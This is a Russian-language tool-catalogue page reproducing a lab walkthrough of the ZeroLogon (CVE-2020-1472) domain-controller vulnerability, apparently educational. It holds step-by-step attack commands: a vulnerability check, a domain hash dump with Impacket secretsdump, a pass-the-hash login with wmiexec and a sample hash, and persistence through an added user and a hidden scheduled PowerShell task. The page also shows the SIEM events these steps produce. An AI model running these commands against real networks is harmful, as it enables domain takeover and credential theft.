Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
ZeroLogon-CVE-2020-1472-lab — Объяснение и демонстрация уязвимости ZeroLogon (CVE-2020-1472) | Kitploit
Инструменты/GitHubGitHub/100hnomeunome/zerologon-cve-2020-1472-lab
Повышение привилегийАтаки на ПаролиМеханизмы персистентностиАнализ уязвимостейЭксплуатацияПост-эксплуатацияCTFТестирование на ПроникновениеОбучение и Образование

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Лаборатории и Практика
GitHub100hnomeunome/zerologon-cve-2020-1472-lab

ZeroLogon-CVE-2020-1472-lab

Объяснение и демонстрация уязвимости ZeroLogon (CVE-2020-1472)

Репозиторий
311 месяцев назадЕщё не проверено

ZeroLogon-CVE-2020-1472

Объяснение и демонстрация уязвимости ZeroLogon (CVE-2020-1472)

Цель этой лабораторной работы строго образовательная. Ее выполнение не рекомендуется в производственных средах или в средах, которые вам не принадлежат.

Об уязвимости

Контекст уязвимости

Эта уязвимость позволяет киберпреступнику получить контроль над контроллером домена (DC). Это достигается путем изменения или удаления пароля учетной записи службы на контроллере. Злоумышленник может просто вызвать отказ в обслуживании или получить контроль и завладеть всей сетью. В августе 2020 года Microsoft выпустила патч.

  • Серьезность: 10.0 (Критическая) (CVSS v3.1)

Затронутый компонент: Microsoft Netlogon Remote Protocol (MS-NRPC)

Затронутые версии Windows:

  • Windows Server 2008 R2
  • 2012 / 2012 R2
  • 2016
  • 2019
  • Версии до патча августа/сентября 2020 года

Требования

Клонировать репозитории

  • Impacket
  • zerologon-CVE-2020-1472
  • CVE-2020-1472 - Проверка, уязвим ли целевой сервер

Если выполнять локально!

  • Скачать Kali Linux
  • Скачать уязвимый Windows Server 2008 R2
  • Virtualbox

На AWS также это возможно с этими образами (осторожно с оплатой)

  • Уязвимый Windows - AMI сообщества 921877552404/win2016-dvwa-printnightmare-final-2022-07-04
  • Kali Linux - AMI из Marketplace

Дополнительно: учетная запись в Wazuh для анализа событий SIEM.

  • Wazuh Cloud с пробным периодом 14 дней

Как эксплуатировать

Подсказка: В Kali Linux служба SSH отключена по умолчанию — ее необходимо запустить вручную.

Перед проверкой уязвимости сервера можно использовать nmap для просмотра открытых портов:

root@kitploit:~
nmap -sS -T4 -F --open -n ip
Скриншот 2025-10-10 в 09 34 13

Используя CVE-2020-1472 - Проверка, уязвим ли целевой сервер. Выполните команду:

root@kitploit:~
zerologon_tester.py <dc-name> <dc-ip>
Скриншот 2025-10-04 в 20 14 40

Инструмент secretdump — это утилита из Impacket

root@kitploit:~
python3 secretsdump.py -just-dc wayne/w2008\[email protected]
Скриншот 2025-10-04 в 20 23 53
root@kitploit:~
python3 wmiexec.py wayne/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:088386eb6982d0c2f8960c26b1ff9e6c
Скриншот 2025-10-04 в 20 27 05

Если все пройдет хорошо, мы сможем войти с помощью хэша Что такое атака pass-the-hash?

Скриншот 2025-10-04 в 20 30 39

Теперь осталось только создать постоянство! Можно нового пользователя!

root@kitploit:~
net user coringa Batman2025 /add
Скриншот 2025-10-04 в 20 36 09

Готово! Пользователь успешно создан!

Скриншот 2025-10-04 в 20 38 04

Также можно создать задачу!

root@kitploit:~
mkdir C:\Temp
root@kitploit:~
schtasks /Create /TN "CriarBackupPS1" /TR "powershell -NoProfile -WindowStyle Hidden -Command \"New-Item -Path 'C:\Temp\backup.ps1' -ItemType File -Force -Value '# backup script'\"" /SC ONLOGON /RL HIGHEST /F
Скриншот 2025-10-10 в 10 17 17 Скриншот 2025-10-10 в 10 20 33

События в SIEM

Можно увидеть создание пользователей и события, связанные с pass-the-hash и созданием пользователей!

2025-10-06_10-08-10 2025-10-06_10-09-06

Ссылки

  • Zerologon (CVE-2020-1472): Неаутентифицированное повышение привилегий до полных прав домена
  • Что такое Zerologon?
  • [MS-NRPC]: Netlogon Remote Protocol
  • CVE-2020-1472 Описание
  • ZeroLogon-CVE-2020-1472 - Лабораторная работа на Youtube
  • Атака Pass-the-Hash
  • Подробнее об Impacket
Скачать инструмент